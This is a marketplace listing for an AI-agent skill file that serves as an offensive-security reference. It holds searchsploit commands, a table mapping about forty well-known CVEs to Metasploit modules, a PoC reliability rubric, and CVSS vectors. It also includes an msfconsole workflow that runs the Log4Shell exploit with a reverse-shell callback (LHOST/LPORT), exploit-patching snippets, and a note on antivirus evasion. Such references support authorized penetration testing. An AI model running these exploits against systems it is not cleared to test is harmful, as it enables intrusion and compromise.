Exploit Db

Name: Exploit Db
Author: mukul975
ASecurity
Exploit-DB and searchsploit reference — EDB→Metasploit module mappings, PoC reliability rubric, CVSS tier quick reference, and searchsploit usage patterns
36 stars
0 votes
0 copies
0 views
Added 5/28/2026
ai-agentspythongojavashellbash
Works with

cli
Security Analysis

A100/100
Scanned 5/28/2026
Install via CLI
$openskills install mukul975/Threatswarm
Files
SKILL.md
---
name: exploit-db
description: Exploit-DB and searchsploit reference — EDB→Metasploit module mappings, PoC reliability rubric, CVSS tier quick reference, and searchsploit usage patterns
allowed-tools: Bash, Read
---

## searchsploit Usage Patterns

```bash
# Text search in title/path
searchsploit apache 2.4

# Search by CVE
searchsploit --cve CVE-2021-41773
searchsploit --cve CVE-2021-44228

# JSON output for scripting
searchsploit apache --json | python3 -c "
import sys, json
data = json.load(sys.stdin)
for e in data.get('RESULTS_EXPLOIT', []):
    print(e['EDB-ID'], e['Title'], e['Path'])
"

# Copy exploit to working dir
searchsploit -m 50383

# Update database
searchsploit -u

# Search by nmap XML output
searchsploit --nmap nmap_output.xml

# Filter by type (webapps, local, remote, dos)
searchsploit -t "remote" apache

# Search for specific OS
searchsploit windows 10 privilege escalation

# Show only exploits (not shellcodes/papers)
searchsploit wordpress --www-exploit-db
```

## EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)

| CVE / EDB-ID | Vulnerability | Metasploit Module | Reliability |
|---|---|---|---|
| CVE-2017-0144 / EDB-41891 | MS17-010 EternalBlue | `exploit/windows/smb/ms17_010_eternalblue` | Weaponized |
| CVE-2021-44228 / EDB-50592 | Log4Shell RCE | `exploit/multi/http/log4shell_header_injection` | Weaponized |
| CVE-2021-1675 / EDB-50265 | PrintNightmare | `exploit/windows/dcerpc/cve_2021_1675_printnightmare` | Weaponized |
| CVE-2021-34473 / EDB-50243 | ProxyShell Exchange | `exploit/windows/http/exchange_proxyshell_rce` | Weaponized |
| CVE-2020-1472 / EDB-49071 | ZeroLogon | `auxiliary/admin/dcerpc/cve_2020_1472_zerologon` | Weaponized |
| CVE-2022-22965 / EDB-50798 | Spring4Shell | `exploit/multi/http/spring_framework_rce_spring4shell` | Weaponized |
| CVE-2019-19781 / EDB-47901 | Citrix ADC Path Traversal | `exploit/linux/http/citrix_dir_traversal_rce` | Weaponized |
| CVE-2020-5902 / EDB-48695 | F5 BIG-IP RCE | `exploit/linux/http/f5_bigip_tmui_rce` | Weaponized |
| CVE-2021-26855 / EDB-49637 | ProxyLogon Exchange | `exploit/windows/http/exchange_proxylogon_rce` | Weaponized |
| CVE-2022-26134 / EDB-51076 | Confluence OGNL RCE | `exploit/multi/http/atlassian_confluence_namespace_ognl_injection` | Weaponized |
| CVE-2018-13379 / EDB-47288 | FortiOS Path Traversal | `auxiliary/gather/fortios_vpn_user_cred` | Functional |
| CVE-2022-1388 / EDB-50919 | F5 iControl Auth Bypass | `exploit/linux/http/f5_icontrol_rce` | Weaponized |
| CVE-2021-20038 / EDB-50882 | SonicWall SMA Stack Overflow | `exploit/linux/http/sonicwall_sma_overflow` | Functional |
| CVE-2023-46604 / EDB-51880 | Apache ActiveMQ RCE | `exploit/multi/misc/apache_activemq_rce_cve_2023_46604` | Weaponized |
| CVE-2021-3156 / EDB-49521 | Sudo Baron Samedit | `exploit/linux/local/sudo_baron_samedit` | Weaponized |
| CVE-2021-4034 / EDB-50689 | PwnKit polkit LPE | `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` | Weaponized |
| CVE-2022-0847 / EDB-50808 | Dirty Pipe Linux LPE | `exploit/linux/local/cve_2022_0847_dirtypipe` | Weaponized |
| CVE-2016-5195 / EDB-40616 | Dirty COW Linux LPE | `exploit/linux/local/overlayfs_priv_esc` | Weaponized |
| CVE-2014-6271 / EDB-34766 | Shellshock Bash RCE | `exploit/multi/http/apache_mod_cgi_bash_env_exec` | Weaponized |
| CVE-2017-5638 / EDB-41570 | Apache Struts2 RCE | `exploit/multi/http/struts2_content_type_ognl` | Weaponized |
| CVE-2019-0708 / EDB-47416 | BlueKeep RDP RCE | `exploit/windows/rdp/cve_2019_0708_bluekeep_rce` | Functional |
| CVE-2020-0796 / EDB-48260 | SMBGhost RCE | `exploit/windows/smb/cve_2020_0796_smbghost` | Functional |
| CVE-2018-7600 / EDB-44449 | Drupalgeddon2 RCE | `exploit/unix/webapp/drupal_drupalgeddon2` | Weaponized |
| CVE-2019-0211 / EDB-46676 | Apache HTTPd LPE | `exploit/multi/http/apache_mod_cgi_bash_env_exec` | Functional |
| CVE-2015-1701 / EDB-37367 | Windows Win32k LPE | `exploit/windows/local/ms15_051_client_copy_image` | Weaponized |
| CVE-2020-14882 / EDB-49391 | Oracle WebLogic RCE | `exploit/multi/http/oracle_weblogic_admin_handle_rce` | Weaponized |
| CVE-2021-22005 / EDB-50513 | vCenter File Upload | `exploit/linux/http/vmware_vcenter_uploadova_rce` | Weaponized |
| CVE-2022-41040 / EDB-51917 | ProxyNotShell Exchange | `exploit/windows/http/exchange_proxynotshell_rce` | Functional |
| CVE-2023-22515 / EDB-51899 | Confluence Priv Esc | Manual PoC required | Functional |
| CVE-2024-21762 / EDB-51960 | FortiOS OOB Write | Manual PoC required | Weaponized |
| CVE-2019-11510 / EDB-47297 | Pulse Secure Arb File Read | `auxiliary/gather/pulse_secure_file_read` | Weaponized |
| CVE-2020-3452 / EDB-48577 | Cisco ASA Path Traversal | `auxiliary/gather/cisco_asa_local_file_inclusion` | Weaponized |
| CVE-2021-40539 / EDB-50781 | ManageEngine RCE | `exploit/multi/http/manageengine_adselfservice_plusrce` | Weaponized |
| CVE-2022-36537 / EDB-51327 | ZK Framework RCE | Manual PoC | Functional |
| CVE-2023-4966 / EDB-51888 | Citrix Bleed Session Leak | Manual PoC | Weaponized |
| CVE-2024-3400 / EDB-52023 | PAN-OS GlobalProtect RCE | Manual PoC | Weaponized |
| CVE-2022-47966 / EDB-51518 | ManageEngine SAML RCE | `exploit/linux/http/zoho_manageengine_saml_rce` | Weaponized |
| CVE-2023-27997 / EDB-51832 | FortiGate SSL-VPN Heap BOF | Manual PoC | Weaponized |
| CVE-2023-20198 / EDB-51873 | Cisco IOS XE Priv Esc | Manual PoC | Weaponized |
| CVE-2024-6387 / EDB-52098 | OpenSSH regreSSHion | Manual PoC (race) | DoS-only |

## PoC Reliability Rubric

| Level | Label | Criteria | Action |
|---|---|---|---|
| 1 | **Weaponized** | Works out-of-box against target version, produces shell/access reliably | Test directly; log as `CONFIRMED` |
| 2 | **Functional** | Requires minor adaptation (change URL, adjust offset) | Modify per target; log as `VERIFIED` |
| 3 | **DoS-only** | Crashes service but no code exec | Confirm version, log as `CONFIRMED-DOS` |
| 4 | **Theoretical** | Academic writeup, no working code | Write PoC from paper or skip |
| 5 | **False/Invalid** | Patched, misidentified, or wrong version | Log as `NOT-APPLICABLE` |

**Reliability Assessment Checklist:**
```
□ Check affected version range vs target version (confirm match)
□ Read comments/issues on GitHub PoC for known problems
□ Check EDB verified badge (green checkmark = tested by staff)
□ Note compile requirements (libc version, kernel headers, etc.)
□ Test in identical OS/service version lab before live target
□ Check VT multi-scanner on compiled binary (defense evasion consideration)
```

## CVSS 3.1 Tier Quick Reference

| Score | Severity | Vector Pattern | Examples |
|---|---|---|---|
| 9.0–10.0 | **CRITICAL** | `AV:N/AC:L/PR:N/UI:N/S:C` | Pre-auth RCE, unauthenticated critical |
| 7.0–8.9 | **HIGH** | `AV:N/AC:L/PR:N/UI:N` | Auth bypass, post-auth RCE, LPE |
| 4.0–6.9 | **MEDIUM** | `AV:N/AC:L/PR:L` or `AV:L/AC:L` | Auth required, info disclosure |
| 0.1–3.9 | **LOW** | `AV:L/AC:H/PR:H` | Physical access, complex conditions |

**Common Vector Components:**
```
AV: N(network) L(local) P(physical) A(adjacent)
AC: L(low) H(high)
PR: N(none) L(low) H(high)
UI: N(none) R(required)
S:  U(unchanged) C(changed)
C/I/A: N(none) L(low) H(high)
```

**Pre-built CVSS Vectors by Category:**
```
Pre-auth RCE (critical):    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  = 9.8
Auth bypass + access:       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
Post-auth RCE:              CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 8.8
Local privilege escalation: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 7.8
Stored XSS (admin):        CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N  = 5.4
SQLi (read-only):           CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  = 6.5
SSRF (internal):            CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N  = 7.2
Path traversal (LFI):       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
DoS (network):              CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H  = 7.5
CSRF (state-change):        CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  = 6.5
```

## searchsploit + Metasploit Workflow

```bash
# 1. Find relevant exploits
searchsploit --cve CVE-2021-44228 --json | python3 -m json.tool

# 2. View exploit details before downloading
searchsploit -x exploits/java/webapps/50592.py

# 3. Mirror to current directory
searchsploit -m 50592

# 4. Find matching MSF module
msfconsole -q -x "search cve:2021-44228; exit"

# 5. Run MSF module
msfconsole -q -x "
use exploit/multi/http/log4shell_header_injection
set RHOSTS $TARGET
set RPORT $PORT
set TARGETURI /
set LHOST $LHOST
set LPORT $LPORT
run
exit
"
```

## Common Exploit Modification Patterns

```python
# Pattern 1: Fix URL in raw exploit
import re
code = open('exploit.py').read()
code = re.sub(r'http://[0-9.]+', f'http://{TARGET}', code)

# Pattern 2: Fix shell command in exploit
# Find LHOST/LPORT references and replace with env vars
import os
LHOST = os.environ['LHOST']
LPORT = os.environ['LPORT']

# Pattern 3: Adjust buffer offset for target binary version
# Use cyclic pattern to find EIP/RIP offset
python3 -c "from pwntools import *; print(cyclic(200))" | ./$BINARY
# Then check crash offset with: cyclic_find(b'faab')
```
Exploit Db

Works with

Security Analysis

Attribution

Comments (0)
